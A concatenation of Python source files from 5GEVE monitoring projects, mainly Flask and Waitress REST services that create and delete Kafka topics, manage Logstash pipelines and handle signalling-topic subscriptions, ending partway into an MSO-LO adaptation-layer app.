# subprocess.Popen(
# [
# "/bin/bash",
# "/opt/kafka/bin/kafka-run-class.sh",
# "kafka.tools.MirrorMaker",
# "--consumer.config",
# "/usr/bin/dcm/" + site + "_consumer.config",
# "--num.streams",
# "2",
# "--producer.config",
# "/usr/bin/dcm/producer.config",
# "--whitelist",
# "'^.*\.application_metric\..*$,^.*\.infrastructure_metric\..*$'",
# ],
# stdout=subprocess.PIPE,
# stderr=subprocess.STDOUT,
# )
# start_mirror("spanish")
# start_mirror("italian")
# start_mirror("french")
# start_mirror("greek")
@app.route('/', methods=['GET'])
def server_status():
"""
Get status.
---
describe: get status
responses:
200:
description: OK
"""
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
"""
Get swagger specification.
---
describe: get swagger specification
responses:
swagger:
description: swagger specification
"""
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "DCM REST API"
return jsonify(swag)
def create_kafka_topic(topic):
logger.info("Creating topic %s in Kafka", topic)
# TODO (if needed). 2 partitions minimum without key
if "signalling." in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
elif ".kpi." in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
elif ".spain_" in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Spanish site", topic)
r = requests.post(spanish_site_url + topic)
logger.info("Response from Spanish site: Code %s", r)
if r.status_code == 500:
raise Exception("Topic %s not created in Spanish site", topic)
elif ".italy_" in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Italian site", topic)
r = requests.post(italian_site_url + topic)
logger.info("Response from Italian site: Code %s", r)
if r.status_code == 500:
raise Exception("Topic %s not created in Italian site", topic)
elif ".france_" in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to French site", topic)
r = requests.post(french_site_url + topic)
logger.info("Response from French site: Code %s", r)
if r.status_code == 500:
raise Exception("Topic %s not created in French site", topic)
elif ".greece_" in topic:
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--create', '--zookeeper', dcm_ip_address+":2181", '--replication-factor', '1', '--partitions', '1', '--topic', topic])
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Greek site", topic)
r = requests.post(greek_site_url + topic)
logger.info("Response from Greek site: Code %s", r)
if r.status_code == 500:
raise Exception("Topic %s not created in Greek site", topic)
else:
raise Exception("The topic %s has a bad format", topic)
@app.route('/dcm/subscribe', methods=['POST'])
def subscribe():
"""
Subscribe to signalling topic.
---
describe: subscribe to signalling topic
parameters:
- in: body
name: signalling_topic_data
schema:
id: signalling_topic_data
properties:
expId:
type: string
description: expId set to 'internal'
topic:
type: string
description: signalling topic name
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - POST /dcm/subscribe")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
        # TODO (if needed). Check client-id and group-id. Group-id should ensure a unique consumer. If we have several consumers in a group, data can be shared and we don't want it.
data = request.get_json()
logger.info("Data received: %s", data)
create_kafka_topic(data["topic"])
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def delete_kafka_topic(topic):
# Do not forget to set delete.topic.enable=true in config/server.properties.
if "signalling." in topic:
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif ".kpi." in topic:
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif ".spain_" in topic:
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Spanish site", topic)
r = requests.delete(spanish_site_url + topic)
logger.info("Response from Spanish site: Code %s", r)
if r.status_code == 200:
# Finally, delete the topic
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif r.status_code == 500:
raise Exception("Topic %s not deleted in Spanish site", topic)
elif ".italy_" in topic:
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Italian site", topic)
r = requests.delete(italian_site_url + topic)
logger.info("Response from Italian site: Code %s", r)
if r.status_code == 200:
# Finally, delete the topic
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif r.status_code == 500:
raise Exception("Topic %s not deleted in Italian site", topic)
elif ".france_" in topic:
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to French site", topic)
r = requests.delete(french_site_url + topic)
logger.info("Response from French site: Code %s", r)
if r.status_code == 200:
# Finally, delete the topic
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif r.status_code == 500:
raise Exception("Topic %s not deleted in French site", topic)
elif ".greece_" in topic:
# Then, send the topic name to the corresponding broker
logger.info("Sending topic %s to Greek site", topic)
r = requests.delete(greek_site_url + topic)
logger.info("Response from Greek site: Code %s", r)
if r.status_code == 200:
# Finally, delete the topic
logger.info("Deleting topic %s in Kafka", topic)
subprocess.call(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--delete', '--zookeeper', dcm_ip_address+":2181", '--topic', topic])
elif r.status_code == 500:
raise Exception("Topic %s not deleted in Greek site", topic)
else:
raise Exception("The topic %s has a bad format", topic)
@app.route('/dcm/unsubscribe', methods=['DELETE'])
def unsubscribe():
"""
Unsubscribe to signalling topic.
---
describe: unsubscribe to signalling topic
parameters:
- in: body
name: signalling_topic_data
schema:
id: signalling_topic_data
properties:
expId:
type: string
description: expId set to 'internal'
topic:
type: string
description: signalling topic name
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - DELETE /dcm/unsubscribe")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
data = request.get_json()
logger.info("Data received: %s", data)
delete_kafka_topic(data["topic"])
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
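# Example body accepted by /dcm/subscribe and /dcm/unsubscribe, based on the swagger
# docstrings above (values are illustrative):
#   {
#       "expId": "internal",
#       "topic": "signalling.metric.application"
#   }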
def publish_in_kafka(topic, data):
logger.info("Publish data in Kafka topic %s", topic)
# TODO (if needed). Key? No, do RR between partitions. If I use the same key, it uses the same partition.
futures = producer.send(topic=topic, value=json.dumps(data))
response = futures.get()
logger.info("Response from Kafka: %s", response)
@app.route('/dcm/publish/<topic>', methods=['POST'])
def publish(topic):
"""
Publish data in a topic.
---
describe: publish data in a topic
definitions:
- schema:
id: record
properties:
value:
description: value included in the records list
schema:
id: value
properties:
topic:
type: string
description: topic name
expId:
type: string
description: experiment ID
action:
type: string
description: either subscribe or unsubscribe
context:
description: additional information
schema:
id: context
properties:
metricId:
type: string
description: metric ID (if topic is related to a metric)
kpiId:
type: string
description: KPI ID (if topic is related to a KPI)
metricCollectionType:
type: string
description: metric collection type (if topic is related to a metric)
graph:
type: string
description: graph type (LIE, PIE, GAUGE)
name:
type: string
description: metric name
unit:
type: string
description: metric unit
interval:
type: string
description: time interval to capture the metric
parameters:
- in: path
name: topic
type: string
description: topic name
- in: body
name: records
type: array
description: records sent in the message
items:
$ref: "#/definitions/record"
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - POST /dcm/publish/%s", topic)
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
logger.info("Data received in topic %s", topic)
data = request.get_json()
if "signalling" in topic:
# Data received from a signalling topic, whose data model is well-known.
records = data["records"]
logger.info("Records raw list: %s", records)
for value in records:
if value["value"]["topic"].count('.') != 4 or value["value"]["topic"].count(' ') != 0 or value["value"]["topic"].count(',') != 0:
raise Exception("Incorrect format in topic name: %s", value["value"]["topic"])
else:
logger.info("Value received: topic %s - expId %s - action %s - context %s", value["value"]["topic"], value["value"]["expId"], value["value"]["action"], value["value"]["context"])
if value["value"]["action"] == "subscribe":
kafka_topic = value["value"]["topic"]
if subprocess.check_output(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--list', '--zookeeper', dcm_ip_address+":2181"]).decode("utf-8").find(kafka_topic) == -1:
# Subscribe operation: create the Kafka topic.
# Notify subscribers from the corresponding signalling topic.
if "application" in topic and ".application_metric." in kafka_topic:
create_kafka_topic(kafka_topic)
publish_in_kafka(signalling_metric_application, value["value"])
elif "infrastructure" in topic and ".infrastructure_metric." in kafka_topic:
create_kafka_topic(kafka_topic)
publish_in_kafka(signalling_metric_infrastructure, value["value"])
elif "kpi" in topic and ".kpi." in kafka_topic:
create_kafka_topic(kafka_topic)
publish_in_kafka(signalling_kpi, value["value"])
else:
logger.warning("No data sent to Kafka")
else:
logger.warning("The topic %s already exists in Kafka", kafka_topic)
else:
kafka_topic = value["value"]["topic"]
if subprocess.check_output(['/bin/bash', '/opt/kafka/bin/kafka-topics.sh', '--list', '--zookeeper', dcm_ip_address+":2181"]).decode("utf-8").find(kafka_topic) != -1:
# Notify subscribers from the corresponding signalling topic.
# Unsubscribe operation: delete the Kafka topic.
if "application" in topic and ".application_metric." in kafka_topic:
publish_in_kafka(signalling_metric_application, value["value"])
delete_kafka_topic(kafka_topic)
elif "infrastructure" in topic and ".infrastructure_metric." in kafka_topic:
publish_in_kafka(signalling_metric_infrastructure, value["value"])
delete_kafka_topic(kafka_topic)
elif "kpi" in topic and ".kpi." in kafka_topic:
publish_in_kafka(signalling_kpi, value["value"])
delete_kafka_topic(kafka_topic)
else:
logger.warning("No data sent to Kafka")
else:
logger.warning("The topic %s does not exist in Kafka", kafka_topic)
else:
# Data received from another component (e.g. Data Shipper using the REST API). Just publish the JSON payload as received.
# In this case, it is supposed that topic has been already created in Kafka beforehand.
# TODO (if needed). Review this publish operation.
publish_in_kafka(topic, data)
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def checkValidPort(value):
ivalue = int(value)
# RFC 793
if ivalue < 0 or ivalue > 65535:
raise argparse.ArgumentTypeError("%s is not a valid port" % value)
return value
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--dcm_ip_address",
help='DCM IP address, default IP is localhost',
default='localhost')
parser.add_argument(
"--port",
type=checkValidPort,
help='The port you want to use as an endpoint, default port is 8090',
default="8090")
parser.add_argument(
"--spanish_site_plugin_ip_port",
help='Spanish Kafka broker site plugin IP:port',
default='localhost:8090')
parser.add_argument(
"--italian_site_plugin_ip_port",
help='Italian Kafka broker site plugin IP:port',
default='localhost:8090')
parser.add_argument(
"--french_site_plugin_ip_port",
help='French Kafka broker site plugin IP:port',
default='localhost:8090')
parser.add_argument(
"--greek_site_plugin_ip_port",
help='Greek Kafka broker site plugin IP:port',
default='localhost:8090')
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % args.log)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.getLogger("DCMRestClient").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
global dcm_ip_address
dcm_ip_address= str(args.dcm_ip_address)
global producer
producer = KafkaProducer(bootstrap_servers = dcm_ip_address + ":" + kafka_port, value_serializer=lambda x: json.dumps(x).encode('utf-8'))
global spanish_site_url
spanish_site_url = "http://" + str(args.spanish_site_plugin_ip_port) + "/dcm_plugin/"
global italian_site_url
italian_site_url = "http://" + str(args.italian_site_plugin_ip_port) + "/dcm_plugin/"
global french_site_url
french_site_url = "http://" + str(args.french_site_plugin_ip_port) + "/dcm_plugin/"
global greek_site_url
greek_site_url = "http://" + str(args.greek_site_plugin_ip_port) + "/dcm_plugin/"
logger.info("Serving DCMRestClient on port %s", str(args.port))
serve(app, host='0.0.0.0', port=args.port)
``` |
{
"source": "5GEVE/5geve-wp4-dcs-signalling-topic-handler",
"score": 2
} |
#### File: 5GEVE/5geve-wp4-dcs-signalling-topic-handler/dcs_rest_client.py
```python
import requests
import argparse
import logging
import coloredlogs
import threading
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
import subprocess
import json
from kafka import KafkaConsumer
from threading import Thread
from threading import Timer
from datetime import timedelta
import psycopg2
import time
app = Flask(__name__)
logger = logging.getLogger("DCSRestClient")
signalling_metric_infrastructure = {'expId': 'internal', 'topic': 'signalling.metric.infrastructure'}
signalling_metric_application = {'expId': 'internal', 'topic': 'signalling.metric.application'}
signalling_kpi = {'expId': 'internal', 'topic': 'signalling.kpi'}
dcm_port = "8090"
dcm_subscribe_url = "/dcm/subscribe"
dcm_unsubscribe_url = "/dcm/unsubscribe"
dcs_dashboard_url = "http://127.0.0.1:8080/portal/dcs/dashboard"
signalling_start = False
@app.route('/', methods=['GET'])
def server_status():
"""
Get status.
---
describe: get status
responses:
200:
description: OK
"""
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
"""
Get swagger specification.
---
describe: get swagger specification
responses:
swagger:
description: swagger specification
"""
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "DCS REST API"
return jsonify(swag)
def kafka_consumer_refresh_dashboard_handler(topic, value):
logger.info("Creating Kafka Consumer for %s topic", topic)
consumer = KafkaConsumer(
topic,
bootstrap_servers=[dcm_ip_address + ":9092"],
auto_offset_reset='earliest',
enable_auto_commit=True,
group_id=None,
value_deserializer=lambda x: json.loads(x.decode('utf-8')))
message_received = False
while not message_received:
message = consumer.poll(timeout_ms=1000)
if message != {}:
logger.info("Message received in %s topic: %s", topic, message)
message_received = True
time.sleep(5)
logger.info("Creating dashboard for topic: %s", topic)
r = requests.post(dcs_dashboard_url, json={'records': [ { 'value': json.loads(value) }]})
logger.info("Response: Code %s", r)
# This call seems that is not needed as the dashboard is generated when data is present.
#time.sleep(2)
#logger.info("Refreshing dashboard for %s topic", topic)
#subprocess.call(['/bin/bash', '/usr/bin/dcs/refresh_dashboard.sh', topic])
logger.info("Closing Kafka Consumer for %s topic", topic)
consumer.close()
def index_cleaner(topic, value):
logger.info("Time to delete the dashboard for topic %s", topic)
r = requests.delete(dcs_dashboard_url, json={'records': [ { 'value': json.loads(value) }]})
logger.info("Response: Code %s", r)
logger.info("Time to delete the Elasticsearch index for topic %s", topic)
subprocess.call(['/bin/bash', '/usr/bin/dcs/delete_logstash_pipeline.sh', topic, 'yes'])
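# The signalling consumer below expects messages whose JSON-encoded value
# follows the DCM signalling data model; an illustrative (made-up) example:
# {"topic": "exp1.usecase.application_metric.cpu.node1", "expId": "exp1",
#  "action": "subscribe", "context": {...}}
# Only the "topic" and "action" fields are used in this handler.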
def kafka_consumer_signalling_topic_handler(signalling_topic_data):
logger.info("Creating Kafka Consumer for %s topic", signalling_topic_data["topic"])
consumer = KafkaConsumer(
signalling_topic_data["topic"],
bootstrap_servers=[dcm_ip_address + ":9092"],
auto_offset_reset='earliest',
enable_auto_commit=True,
group_id=None,
value_deserializer=lambda x: json.loads(x.decode('utf-8')))
while signalling_start:
message = consumer.poll(timeout_ms=1000)
if message != {}:
logger.info("Message received in %s topic: %s", signalling_topic_data["topic"], message)
for tp, messages in message.items():
for msg in messages:
logger.info("Value: %s", msg.value)
topic = json.loads(msg.value)["topic"]
if json.loads(msg.value)["action"] == "subscribe":
logger.info("Create Logstash pipeline for topic %s", topic)
subprocess.call(['/bin/bash', '/usr/bin/dcs/create_logstash_pipeline.sh', topic])
# Dashboard creation is commented because it will be created when data is published in the topic.
#r = requests.post(dcs_dashboard_url, json={'records': [ { 'value': json.loads(msg.value) }]})
#logger.info("Response: Code %s", r)
# Create Kafka consumer to wait for the first message received in the topic and, then, refresh the dashboard.
thread = threading.Thread(target = kafka_consumer_refresh_dashboard_handler, args = [topic, msg.value])
thread.start()
# Finally, save topic in DB
try:
connection = psycopg2.connect(user = "eve", password = <PASSWORD>, host = "localhost", port = "5432", dbname="pipelines")
logger.info("Inserting %s topic in database", topic)
cursor = connection.cursor()
cursor.execute("INSERT INTO pipeline VALUES ( %s )", (topic,))
connection.commit()
logger.info("Topic %s inserted in database", topic)
cursor.close()
connection.close()
except (Exception, psycopg2.Error) as error:
logger.error("Error while connecting to PostgreSQL: ", error)
elif json.loads(msg.value)["action"] == "unsubscribe":
logger.info("Delete Logstash pipeline for topic %s", topic)
subprocess.call(['/bin/bash', '/usr/bin/dcs/delete_logstash_pipeline.sh', topic, 'no'])
# Schedule the removal of Kibana dashboard and Elasticsearch index (retention time of 14 days)
scheduled_thread = threading.Timer(timedelta(days=14).total_seconds(), index_cleaner, args = [topic, msg.value])
# This call is for testing purposes, to be commented when unused:
#scheduled_thread = threading.Timer(timedelta(seconds=30).total_seconds(), index_cleaner, args = [topic, msg.value])
scheduled_thread.start()
logger.info("Data removal for topic %s scheduled in 14 days", topic)
# Finally, delete topic in DB
try:
connection = psycopg2.connect(user = "eve", password = <PASSWORD>, host = "localhost", port = "5432", dbname="pipelines")
logger.info("Deleting %s topic in database", topic)
cursor = connection.cursor()
cursor.execute("DELETE FROM pipeline WHERE topic = %s", (topic,))
connection.commit()
logger.info("Topic %s deleted in database", topic)
cursor.close()
connection.close()
except (Exception, psycopg2.Error) as error:
logger.error("Error while connecting to PostgreSQL: ", error)
else:
logger.error("Action not allowed")
logger.info("Closing Kafka Consumer for %s topic", signalling_topic_data["topic"])
consumer.close()
def start_consuming_signalling_topic(signalling_topic_data):
signalling_topic_data = json.loads(signalling_topic_data)
logger.info("Starting %s topic", signalling_topic_data["topic"])
logger.info("Sending POST request to %s", url_subscribe)
# Send the request to the DCM.
r = requests.post(url_subscribe, json=signalling_topic_data)
logger.info("Response: Code %s", r)
# Create Kafka consumer.
global signalling_start
signalling_start = True
thread = threading.Thread(target = kafka_consumer_signalling_topic_handler, args = [signalling_topic_data])
thread.start()
@app.route('/portal/dcs/start_signalling/', methods=['POST'])
def start_dcs():
"""
Start signalling topics.
---
describe: start signalling topics
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - POST /portal/dcs/start_signalling/")
try:
start_consuming_signalling_topic(json.dumps(signalling_metric_infrastructure))
start_consuming_signalling_topic(json.dumps(signalling_metric_application))
start_consuming_signalling_topic(json.dumps(signalling_kpi))
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def stop_consuming_signalling_topic(signalling_topic_data):
signalling_topic_data = json.loads(signalling_topic_data)
logger.info("Stopping %s topic", signalling_topic_data["topic"])
logger.info("Sending DELETE request to %s", url_unsubscribe)
# Send the request to the DCM.
r = requests.delete(url_unsubscribe, json=signalling_topic_data)
logger.info("Response: Code %s", r)
# Delete Kafka consumer.
global signalling_start
# Put signalling_start to False, and then threads will finish their execution.
signalling_start = False
@app.route('/portal/dcs/stop_signalling/', methods=['DELETE'])
def stop_dcs():
"""
Stop signalling topics.
---
describe: stop signalling topics
responses:
201:
description: accepted request
400:
description: error processing the request
"""
logger.info("Request received - DELETE /portal/dcs/stop_signalling/")
try:
stop_consuming_signalling_topic(json.dumps(signalling_metric_infrastructure))
stop_consuming_signalling_topic(json.dumps(signalling_metric_application))
stop_consuming_signalling_topic(json.dumps(signalling_kpi))
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
def checkValidPort(value):
ivalue = int(value)
# RFC 793
if ivalue < 0 or ivalue > 65535:
raise argparse.ArgumentTypeError("%s is not a valid port" % value)
return value
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--dcm_ip_address",
help='DCM IP address, default IP is localhost',
default='localhost')
parser.add_argument(
"--eve_db_password",
help='DB password for eve user')
parser.add_argument(
"--port",
type=checkValidPort,
help='The port you want to use as an endpoint, default port is 8091',
default="8091")
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % args.log)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.basicConfig(filename='/var/log/dcs_rest_client.log')
logging.getLogger("DCSRestClient").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
logger.info("Serving DCSRestClient on port %s", str(args.port))
global dcm_ip_address
dcm_ip_address= str(args.dcm_ip_address)
global url_subscribe
url_subscribe = "http://" + dcm_ip_address + ":" + dcm_port + dcm_subscribe_url
global url_unsubscribe
url_unsubscribe = "http://" + dcm_ip_address + ":" + dcm_port + dcm_unsubscribe_url
global eve_db_password
eve_db_password= str(args.eve_db_password)
#TODO: advanced feature - connect to the database and make sure that Logstash pipelines are created for the topics saved in the DB.
serve(app, host='0.0.0.0', port=args.port)
``` |
{
"source": "5GEVE/monitoring_dockerized_environment",
"score": 2
} |
#### File: create_kafka_topic/files/create_kafka_topic.py
```python
import requests
import argparse
import logging
import coloredlogs
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
from kafka.admin import KafkaAdminClient, NewTopic
import json
app = Flask(__name__)
logger = logging.getLogger("CreateKafkaTopic")
@app.route('/', methods=['GET'])
def server_status():
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "CreateKafkaTopic REST API"
return jsonify(swag)
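# Illustrative usage (assumed example): POST /create_kafka_topic with a JSON
# body such as {"topic": "exp1.usecase.application_metric.cpu.node1"}; the
# topic is created with 1 partition and a replication factor of 1.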
@app.route('/create_kafka_topic', methods=['POST'])
def create_kafka_topic():
logger.info("Request received - POST /create_kafka_topic")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
admin_client = KafkaAdminClient(
bootstrap_servers=kafka_ip_port,
client_id='create_kafka_topic')
# Parse JSON
data = request.get_json()
logger.info("Data received: %s", data)
topic = data["topic"]
logger.info("Creating topic %s in Kafka", topic)
topic_list = []
topic_list.append(NewTopic(name=topic, num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
admin_client.close()
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
if __name__ == "__main__":
# Usage: /usr/bin/python3 create_kafka_topic.py --kafka_ip_port localhost:9092 --log info
parser = argparse.ArgumentParser()
parser.add_argument(
"--kafka_ip_port",
help='Kafka IP:port',
default='localhost:9092')
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % args.log)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.getLogger("CreateKafkaTopic").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
global kafka_ip_port
kafka_ip_port= str(args.kafka_ip_port)
logger.info("Serving CreateKafkaTopic on port 8190")
serve(app, host='0.0.0.0', port=8190)
```
#### File: v1/files/logstash_pipeline_manager.py
```python
import requests
import argparse
import logging
import coloredlogs
from flask import Flask, request, jsonify
from flask_swagger import swagger
from waitress import serve
import subprocess
import json
app = Flask(__name__)
logger = logging.getLogger("LogstashPipelineManager")
@app.route('/', methods=['GET'])
def server_status():
logger.info("GET /")
return '', 200
@app.route("/spec", methods=['GET'])
def spec():
swag = swagger(app)
swag['info']['version'] = "1.0"
swag['info']['title'] = "LogstashPipelineManager REST API"
return jsonify(swag)
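# Both endpoints below expect a JSON body with a single "topic" field, e.g.
# {"topic": "exp1.usecase.application_metric.cpu.node1"} (made-up value); the
# helper scripts then create or delete the matching Logstash pipeline.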
@app.route('/logstash_pipeline_manager', methods=['POST'])
def create_logstash_pipeline():
logger.info("Request received - POST /logstash_pipeline_manager")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
# Parse JSON
data = request.get_json()
logger.info("Data received: %s", data)
topic = data["topic"]
logger.info("Create Logstash pipeline for topic %s", topic)
subprocess.call(['/bin/bash', script_path + '/create_logstash_pipeline.sh', topic, elasticsearch_ip_port, kafka_ip_port, elk_password])
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
@app.route('/logstash_pipeline_manager', methods=['DELETE'])
def delete_logstash_pipeline():
logger.info("Request received - DELETE /logstash_pipeline_manager")
if not request.is_json:
logger.warning("Format not valid")
return 'Format not valid', 400
try:
# Parse JSON
data = request.get_json()
logger.info("Data received: %s", data)
topic = data["topic"]
logger.info("Delete Logstash pipeline for topic %s", topic)
subprocess.call(['/bin/bash', script_path + '/delete_logstash_pipeline.sh', topic])
except Exception as e:
logger.error("Error while parsing request")
logger.exception(e)
return str(e), 400
return '', 201
if __name__ == "__main__":
# Usage: /usr/bin/python3 logstash_pipeline_manager.py --script_path /tmp --kafka_ip_port localhost:9092 --elasticsearch_ip_port localhost:9200 --elk_password <PASSWORD> --log info
parser = argparse.ArgumentParser()
parser.add_argument(
"--script_path",
help='Script path')
parser.add_argument(
"--kafka_ip_port",
help='Kafka IP:port',
default='localhost:9092')
parser.add_argument(
"--elasticsearch_ip_port",
help='Elasticsearch IP:port',
default='localhost:9200')
parser.add_argument(
"--elk_password",
help='ELK password')
parser.add_argument(
"--log",
help='Sets the Log Level output, default level is "info"',
choices=[
"info",
"debug",
"error",
"warning"],
nargs='?',
default='info')
args = parser.parse_args()
numeric_level = getattr(logging, str(args.log).upper(), None)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level: %s' % args.log)
coloredlogs.install(
fmt='%(asctime)s %(levelname)s %(message)s',
datefmt='%d/%m/%Y %H:%M:%S',
level=numeric_level)
logging.getLogger("LogstashPipelineManager").setLevel(numeric_level)
logging.getLogger("requests.packages.urllib3").setLevel(logging.ERROR)
global script_path
script_path= str(args.script_path)
global kafka_ip_port
kafka_ip_port= str(args.kafka_ip_port)
global elasticsearch_ip_port
elasticsearch_ip_port = str(args.elasticsearch_ip_port)
global url_elasticsearch
url_elasticsearch = "http://" + elasticsearch_ip_port
global elk_password
elk_password= str(args.elk_password)
logger.info("Serving LogstashPipelineManager on port 8191")
serve(app, host='0.0.0.0', port=8191)
```
#### File: serverless_functions/delete-kafka/handler.py
```python
import json
from kafka.admin import KafkaAdminClient
def handle(event, context):
if event.method == "POST":
try:
data = json.loads(event.body)
topic = data["topic"]
admin_client = KafkaAdminClient(
bootstrap_servers="kafka.deployment8:9092",
client_id="delete_kafka_topic",
)
admin_client.delete_topics(topics=[topic])
admin_client.close()
return {"statusCode": 201, "body": "No Content"}
except Exception as e:
return {"statusCode": 400, "body": f"Error parsing request: {e}"}
else:
return {"statusCode": 200, "body": "No action for this endpoint"}
``` |
{
"source": "5GEVE/mso-lo",
"score": 2
} |
#### File: mso-lo/adaptation_layer/app.py
```python
from flask import (
Blueprint, request, jsonify,
abort, make_response
)
import adaptation_layer.driver.manager as manager
from adaptation_layer import database
from adaptation_layer import tasks
from adaptation_layer.error_handler import Unauthorized, BadRequest, \
ServerError, NfvoNotFound, NsNotFound, NsdNotFound, \
NsOpNotFound, NfvoCredentialsNotFound, SubscriptionNotFound, Forbidden, \
Conflict, Unprocessable
nfvo_bp = Blueprint('nfvo', __name__, url_prefix='/nfvo')
rano_bp = Blueprint('rano', __name__, url_prefix='/rano')
@nfvo_bp.route('/', methods=['GET'])
@rano_bp.route('/', methods=['GET'])
def get_orchestrator_list():
try:
if request.blueprint == 'nfvo':
return make_response(jsonify(database.msolo_db.get_nfvo_list()), 200)
elif request.blueprint == 'rano':
return make_response(jsonify(database.msolo_db.get_rano_list()), 200)
except Unauthorized as e:
abort(401, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>', methods=['GET'])
@rano_bp.route('/<orc_id>', methods=['GET'])
def get_nfvo(orc_id):
try:
if request.blueprint == 'nfvo':
return make_response(jsonify(database.msolo_db.get_nfvo_by_id(orc_id)), 200)
elif request.blueprint == 'rano':
return make_response(jsonify(database.msolo_db.get_rano_by_id(orc_id)), 200)
except Unauthorized as e:
abort(401, description=e.description)
except NfvoNotFound as e:
abort(404, description=e.description)
except ServerError as e:
abort(500, description=e.description)
@nfvo_bp.route('/<orc_id>/ns_instances', methods=['POST'])
